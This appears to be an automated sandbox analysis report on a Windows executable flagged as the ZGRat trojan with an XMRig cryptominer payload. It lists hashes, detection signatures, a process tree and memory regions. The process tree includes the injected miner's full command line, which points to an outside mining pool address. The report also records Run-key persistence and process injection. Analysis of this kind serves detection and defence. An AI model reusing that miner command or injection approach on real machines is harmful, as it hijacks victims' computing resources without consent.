Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10-05-2024 02:10

General

  • Target

    FB23FDE22424F2B381E8325FB71CD2B6.exe

  • Size

    2.5MB

  • MD5

    fb23fde22424f2b381e8325fb71cd2b6

  • SHA1

    6628984dbfaf1e4ffc8a46861cad9809e0f53ebe

  • SHA256

    b0e075912e279e893ea6f1aa33a3734679215d740b861ee1f607f1f0406b8094

  • SHA512

    51dd1c34e0a58238a5ea69a58814ca88bbc299282ebae25d8e03014a0c5177daeb480115ff9b4112991fbecf64d3ac04af7fc0026d903dd761a7a8b3e4f25ed8

  • SSDEEP

    49152:WRqr+/a5i+yQgWd2hvEdS82N26odkmgpAqGE0XjJ7lAXkE6:1+Uzyc2vEdSVJmgaqGE0XVKXk

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe
    "C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe
      "C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1932
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2204

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1932-4896-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB

  • memory/1932-4938-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/1932-4900-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/1932-4899-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/2204-4939-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/2204-4932-0x0000000140000000-0x00000001407DC000-memory.dmp

    Filesize

    7.9MB

  • memory/3048-61-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-21-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-11-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-13-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-15-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-17-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-19-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-35-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-37-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-39-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-41-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-43-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-45-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-49-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-51-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-53-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-57-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-55-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-0-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

    Filesize

    4KB

  • memory/3048-63-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-23-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-9-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-4885-0x0000000000500000-0x000000000054C000-memory.dmp

    Filesize

    304KB

  • memory/3048-4884-0x0000000000560000-0x00000000005BA000-memory.dmp

    Filesize

    360KB

  • memory/3048-67-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-66-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-59-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-47-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-33-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-31-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-29-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-27-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-25-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-4886-0x00000000005C0000-0x0000000000614000-memory.dmp

    Filesize

    336KB

  • memory/3048-7-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-4-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-5-0x000000001B410000-0x000000001B628000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-4898-0x000000001B0B6000-0x000000001B11D000-memory.dmp

    Filesize

    412KB

  • memory/3048-4897-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/3048-3-0x000000001B410000-0x000000001B62E000-memory.dmp

    Filesize

    2.1MB

  • memory/3048-2-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

  • memory/3048-1-0x0000000000E70000-0x00000000010F4000-memory.dmp

    Filesize

    2.5MB